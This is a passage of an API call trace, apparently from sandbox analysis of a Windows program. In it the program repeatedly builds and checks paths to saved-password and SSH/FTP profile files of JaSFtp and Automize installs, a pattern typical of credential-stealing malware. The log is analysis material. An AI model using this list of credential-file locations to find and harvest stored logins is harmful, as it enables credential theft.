(x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0063.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.619] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.620] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.620] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0063.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.622] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.623] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.624] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0063.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x638b60 [0063.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.625] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0063.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.626] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.627] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0063.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.628] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.630] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.630] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0063.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.632] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.633] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.634] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0063.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x638b60 [0063.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.635] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0063.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.636] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.638] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0063.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.639] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.640] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.641] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0063.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.642] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.644] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.644] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0063.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.645] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0063.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.647] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.647] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.649] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.650] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.651] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.652] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.655] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.656] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0063.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.657] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0063.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.658] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.659] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.660] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.664] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.664] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.666] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.667] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.668] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0063.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.671] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0063.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.672] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.673] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.674] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.675] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.677] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.677] GetProcessHeap () returned 0x620000 [0063.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.677] GetProcessHeap () returned 0x620000 [0063.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.679] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.679] GetProcessHeap () returned 0x620000 [0063.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.680] GetProcessHeap () returned 0x620000 [0063.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.681] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.681] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0063.681] GetProcessHeap () returned 0x620000 [0063.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.682] GetProcessHeap () returned 0x620000 [0063.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.683] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0063.683] GetProcessHeap () returned 0x620000 [0063.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.684] GetProcessHeap () returned 0x620000 [0063.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.684] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.685] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.685] GetProcessHeap () returned 0x620000 [0063.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.685] GetProcessHeap () returned 0x620000 [0063.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.686] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.687] GetProcessHeap () returned 0x620000 [0063.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.687] GetProcessHeap () returned 0x620000 [0063.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.688] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.688] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.689] GetProcessHeap () returned 0x620000 [0063.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.689] GetProcessHeap () returned 0x620000 [0063.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.690] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.690] GetProcessHeap () returned 0x620000 [0063.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.691] GetProcessHeap () returned 0x620000 [0063.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.691] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.692] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0063.692] GetProcessHeap () returned 0x620000 [0063.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.692] GetProcessHeap () returned 0x620000 [0063.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.694] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0063.694] GetProcessHeap () returned 0x620000 [0063.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.694] GetProcessHeap () returned 0x620000 [0063.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.695] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.696] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0063.696] GetProcessHeap () returned 0x620000 [0063.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.696] GetProcessHeap () returned 0x620000 [0063.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.697] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.697] GetProcessHeap () returned 0x620000 [0063.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.698] GetProcessHeap () returned 0x620000 [0063.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.702] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.704] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0063.704] GetProcessHeap () returned 0x620000 [0063.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.704] GetProcessHeap () returned 0x620000 [0063.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.707] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.707] GetProcessHeap () returned 0x620000 [0063.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.708] GetProcessHeap () returned 0x620000 [0063.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.708] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.709] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0063.709] GetProcessHeap () returned 0x620000 [0063.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.709] GetProcessHeap () returned 0x620000 [0063.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.710] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0063.710] GetProcessHeap () returned 0x620000 [0063.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.710] GetProcessHeap () returned 0x620000 [0063.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.711] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.711] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.711] GetProcessHeap () returned 0x620000 [0063.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.712] GetProcessHeap () returned 0x620000 [0063.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.713] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.713] GetProcessHeap () returned 0x620000 [0063.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.714] GetProcessHeap () returned 0x620000 [0063.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.714] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.715] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.715] GetProcessHeap () returned 0x620000 [0063.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.715] GetProcessHeap () returned 0x620000 [0063.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.716] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.717] GetProcessHeap () returned 0x620000 [0063.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.717] GetProcessHeap () returned 0x620000 [0063.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.718] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.718] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0063.718] GetProcessHeap () returned 0x620000 [0063.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.718] GetProcessHeap () returned 0x620000 [0063.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.719] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0063.719] GetProcessHeap () returned 0x620000 [0063.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.720] GetProcessHeap () returned 0x620000 [0063.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.720] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.721] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.721] GetProcessHeap () returned 0x620000 [0063.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.721] GetProcessHeap () returned 0x620000 [0063.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.722] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.722] GetProcessHeap () returned 0x620000 [0063.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.723] GetProcessHeap () returned 0x620000 [0063.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.724] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.724] 